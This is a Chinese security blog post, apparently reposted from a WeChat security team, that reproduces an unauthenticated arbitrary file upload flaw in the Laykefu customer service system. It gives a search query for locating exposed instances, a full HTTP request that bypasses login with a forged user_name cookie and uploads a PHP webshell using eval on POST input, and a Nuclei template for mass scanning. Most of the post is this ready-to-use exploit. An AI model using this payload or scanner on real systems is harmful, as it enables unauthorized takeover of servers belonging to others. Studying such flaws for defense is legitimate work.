Laykefu客服系统任意文件上传漏洞复现

admin

105551
文章

88
评论

2024年1月24日11:51:12评论76 views字数 1913阅读6分22秒阅读模式

Laykefu客服系统任意文件上传漏洞复现

part.01

漏洞简介

Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞，而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台，未经身份验证的攻击者可利用此问题，上传后门文件，获取服务器权限。

part.02

漏洞复现

步骤一：使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法icon_hash="-334624619"

步骤二：开启代理抓取数据包并修改进行文件上传测试，Success!

POST /admin/users/upavatar.html HTTP/1.1Host: 127.0.0.1Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kRAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user_name=1; user_id=3Connection: close------WebKitFormBoundary3OCVBiwBVsNuB2kRContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/png<?php phpinfo();@eval($_POST['sec']);?>------WebKitFormBoundary3OCVBiwBVsNuB2kR--

Laykefu客服系统任意文件上传漏洞复现

part.03

批量脚本

id: Laykefu-Uploadinfo:  name: Laykefu-Upload  author: lanyue  severity: high  description: Laykefu-Upload-GetShell  reference:  - https://github.com/  - https://cve.mitre.org/  metadata:    max-request: 1    shodan-query: ""    verified: truehttp:- method: POST  path:  - '{{RootURL}}/admin/users/upavatar.html'  headers:    Accept: application/json, text/javascript, */*; q=0.01    Accept-Encoding: gzip, deflate    Accept-Language: zh-CN,zh;q=0.9    Connection: close    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR    Cookie: user_name=1; user_id=3    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,      like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26    X-Requested-With: XMLHttpRequest  body: "------WebKitFormBoundary3OCVBiwBVsNuB2kRrnContent-Disposition: form-data;    name="file"; filename="1.php"rnContent-Type: image/pngrn rn<?php phpinfo();?>rn------WebKitFormBoundary3OCVBiwBVsNuB2kR--"  max-redirects: 3  matchers-condition: and  matchers:  - type: regex    part: body    regex:    - .{30,}.php  - type: status    part: body    status:    - "200"

原文始发于微信公众号（揽月安全团队）：Laykefu客服系统任意文件上传漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

Laykefu客服系统任意文件上传漏洞复现

SeaCMS海洋影视管理系统延时注入(CVE-2024-29275)

【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

Apache OFBiz 目录遍历致代码执行漏洞（CVE-2024-32113）

漏洞预警 | RuvarOA SQL注入漏洞

漏洞预警 | Laravel远程代码执行漏洞

漏洞预警 | MLflow路径遍历漏洞

用友CRM系统uploadfile.php接口存在任意文件上传漏洞

【漏洞复现】平升水库系统 GetRecordsByTableNameAndColumns接口处存在SQL注入漏洞

【漏洞复现】蓝海卓越计费管理系统 agent_setstate 接口处存在SQL注入漏洞

捷诚EnjoySCM-ImportData-UploadFile-任意文件上传漏洞复现

发表评论

在线咨询

微信